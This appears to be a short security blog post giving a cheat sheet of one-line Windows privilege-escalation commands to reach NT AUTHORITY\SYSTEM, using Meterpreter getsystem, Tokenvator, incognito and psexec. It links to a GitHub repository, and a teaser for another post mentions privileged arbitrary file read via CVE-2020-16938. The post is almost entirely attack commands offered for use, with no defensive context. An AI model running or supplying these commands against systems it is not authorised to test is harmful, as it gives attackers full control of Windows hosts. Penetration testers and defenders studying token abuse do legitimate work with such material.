Saturday, August 10, 2019

Windows Token Privilege to "nt authority\system"

Windows Token Privilege to "nt authority\system" With Metasploit : meterpreter> getsystem Without Metasploit: Tokenvator.exe getsystem cmd.exe incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe psexec.exe -s -i cmd.exe


more details:
https://github.com/sailay1996/tokenx_privEsc

No comments:

Post a Comment

Privileged arbitrary file read (CVE-2020-16938) with The Sleuth Kit

After I read one of post from twitter which is about @jonasLyk's  CVE-2020-16938  , I've some idea to do without using 7 zip file ma...